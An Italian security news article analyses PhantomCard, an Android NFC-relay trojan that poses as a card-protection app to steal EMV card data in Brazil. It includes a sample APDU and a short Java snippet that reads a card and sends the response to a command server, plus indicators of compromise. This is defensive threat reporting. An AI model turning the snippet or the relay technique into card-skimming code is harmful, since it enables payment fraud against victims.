Di recente l’abbiamo visto con NFCgate, ora lo scenario si ripete con l’emergere di PhantomCard, un malware Android sofisticato che sfrutta la tecnologia NFC per perpetrare frodi finanziarie. Scoperto in Brasile ma con potenziali ramificazioni globali, questo trojan rappresenta un ulteriore passo avanti nella criminalità informatica, dimostrando come gli attaccanti stiano perfezionando tecniche sempre più avanzate per aggirare le difese tradizionali.
Il funzionamento di PhantomCard
PhantomCard si presenta come un’applicazione legittima, spesso camuffata da strumento per la “protezione delle carte” (come “Proteção Cartões” in Brasile). Distribuito attraverso pagine web che imitano Google Play, il malware convince le vittime a installarlo grazie a recensioni falsificate che ne decantano l’efficacia nel bloccare tentativi di frode. Una volta installato, PhantomCard non richiede autorizzazioni aggiuntive, rendendolo particolarmente subdolo.
Il malware sfrutta il modulo NFC integrato nei dispositivi Android per relazionarsi con le carte di pagamento delle vittime. Quando l’utente avvicina la carta al telefono, PhantomCard legge i dati NFC e li trasmette a un server controllato dai criminali. Questi dati vengono poi utilizzati per effettuare transazioni fraudolente, come pagamenti POS o prelievi ATM, mentre la vittima è convinta di star verificando la sicurezza della propria carta.
La tecnica NFC e il targeting delle carte EMV
PhantomCard è specializzato nel relaying di dati NFC secondo lo standard ISO-DEP (ISO 14443-4), utilizzato dalle carte EMV. A differenza di altre minacce basate su NFC, come NFSkate, che supportano una vasta gamma di tag NFC, PhantomCard si concentra esclusivamente sulle carte di pagamento. Il malware invia comandi APDU specifici, come 00A404000E325041592E5359532E4444463031, per selezionare l’ambiente di pagamento (PSE) e accedere ai dati sensibili della carta.
Ecco un esempio di come il malware gestisce la comunicazione con la carta:
try {
IsoDep isoDep = IsoDep.get(tag);
isoDep.connect();
byte[] response = isoDep.transceive(APDU_SELECT_PSE);
// Invia i dati al server C2
sendToC2(response);
} catch (IOException e) {
Log.e("PhantomCard", "Errore nella lettura della carta", e);
}Le origini cinesi e il modello “as-a-Service”
L’analisi del codice rivela che PhantomCard non è stato sviluppato dall’attore che lo distribuisce, ma proviene da un servizio cinese chiamato NFU Pay, offerto come Malware-as-a-Service (MaaS). Questo modello permette a criminali con competenze limitate di acquistare e personalizzare il malware per i propri scopi. L’attore brasiliano dietro PhantomCard, noto come “Go1ano developer”, è un esempio di questo fenomeno: un “rivenditore” che adatta minacce globali al mercato locale, ampliando il raggio d’azione dei gruppi criminali.
Implicazioni per la sicurezza
PhantomCard rappresenta una sfida significativa per le istituzioni finanziarie. Le transazioni fraudolente effettuate tramite NFC relay appaiono legittime, poiché utilizzano i dati della carta fisica e il PIN della vittima. Solo anomalie nei metadati (come la posizione del merchant) potrebbero rivelare la frode. Per mitigare il rischio, è essenziale:
- Monitorare l’attività di malware come PhantomCard e NFSkate.
- Educare gli utenti sui rischi delle applicazioni non ufficiali.
- Implementare soluzioni di threat intelligence in grado di rilevare comportamenti sospetti legati all’NFC.
Indicatori di Compromissione (IoC)
- Pacchetto:
com.nfupay.s145 - SHA-256:
a78ab0c38fc97406727e48f0eb5a803b1edb9da4a39e613f013b3c5b4736262f - C2: Endpoint
/baxi/b(indicativo del targeting verso il Brasile).
PhantomCard è un ulteriore segnale della crescente sofisticatezza delle minacce mobile. Con il modello MaaS che democratizza l’accesso a strumenti avanzati, è probabile che assisteremo a un’espansione globale di attacchi simili. La collaborazione tra settore finanziario, ricercatori e utenti sarà cruciale per contrastare questa tendenza